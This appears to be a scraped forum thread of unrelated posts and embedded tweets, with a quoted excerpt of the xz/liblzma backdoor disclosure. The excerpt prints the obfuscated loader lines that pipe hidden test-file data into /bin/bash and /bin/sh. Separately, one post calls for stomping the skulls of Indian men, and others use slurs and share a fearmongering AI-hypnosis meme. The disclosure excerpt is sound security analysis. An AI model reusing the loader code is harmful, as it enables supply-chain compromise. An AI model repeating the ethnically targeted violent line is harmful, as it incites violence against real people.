- 22
- 72
- 68
- 138
- 5
- 37
“Our societies have not previously tolerated spaces that are beyond the reach of law enforcement [mass surveillance]” seems like a more complete statement. But can you imagine the Orwellian dystopia we’d live in if the statement was true?
— Matthew Green (@matthew_d_green) April 21, 2024
- 27
- 68
I regret not doing more to support and defend @PalmerLuckey at Facebook. We were in different states and divisions, and I was largely out of the political loop, but when I became aware of the situation I should have made a clear and open statement of opposition to the witch hunt.… https://t.co/OTXBBnkK0p
— John Carmack (@ID_AA_Carmack) April 13, 2024
- 41
- 68
== Compromised Release Tarball ==
One portion of the backdoor is solely in the distributed tarballs. For
easier reference, here's a link to debian's import of the tarball, but it is
also present in the tarballs for 5.6.0 and 5.6.1:
That line is not in the upstream source of build-to-host, nor is
build-to-host used by xz in git. However, it is present in the tarballs
released upstream, except for the "source code" links, which I think github
generates directly from the repository contents:
https://github.com/tukaani-project/xz/releases/tag/v5.6.0
https://github.com/tukaani-project/xz/releases/tag/v5.6.1
This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.
This script is executed and, if some preconditions match, modifies
$builddir/src/liblzma/Makefile to contain
am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
which ends up as
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...
Leaving out the "| bash" that produces
####Hello####
#��Z�.hj�
eval grep ^srcdir= config.status
if test -f ../../config.status;then
eval grep ^srcdir= ../../config.status
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
After de-obfuscation this leads to the attached injected.txt.
== Compromised Repository ==
The files containing the bulk of the exploit are in an obfuscated form in
tests/files/bad-3-corrupt_lzma2.xz
tests/files/good-large_compressed.lzma
committed upstream. They were initially added in
https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0
Note that the files were not even used for any "tests" in 5.6.0.
Subsequently the injected code (more about that below) caused valgrind errors
and crashes in some configurations, due the stack layout differing from what
the backdoor was expecting. These issues were attempted to be worked around
in 5.6.1:
https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad
https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f
https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92
For which the exploit code was then adjusted:
https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89
Given the activity over several weeks, the committer is either directly
involved or there was some quite severe compromise of their
system. Unfortunately the latter looks like the less likely explanation, given
they communicated on various lists about the "fixes" mentioned above.
!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024
- 52
- 75
- 25
- 36
AIs are now capable of hypnotizing humans
— AI Notkilleveryoneism Memes ⏸️ (@AISafetyMemes) April 20, 2024
Why this matters: soon, AGIs may be able to mind control us
This isn’t sci-fi, this already happens!
EXAMPLE #1: Did you know chicken brains have an “off button“? We hypnotize them… because we’re smarter!
And it’s not just chickens… https://t.co/YzWYEP8kbz pic.twitter.com/HEx8nls101
- 8
- 47
- 81
- 100
you think you hate journalists enough etc https://t.co/pneREBsh6P
— eigenrobot (@eigenrobot) April 4, 2024
- 24
- 31
- 37
- 39
- 38
- 54
Progress update for the first soon to be mass manufactured penetration depth detecting sex robot. pic.twitter.com/c2ubplmor9
— Bry.ai (@prince_of_fakes) April 8, 2024
- 10
- 24
Stomp sexy Indian dude skulls with steel toed boots.
- 15
- 35
- 37
- 71
Up until today, you couldn't access Reddit while using a VPN, unless you were logged in. A workaround was to use https://old.reddit.com.
But today, you get the same soy-based message "whoa there, pardner!" on https://old.reddit.com too.
- 7
- 10
- 18
- 57
I wonder if will intervene
https://www.fox5ny.com/news/report-hillary-clinton-considered-drone-attack-on-julian-assange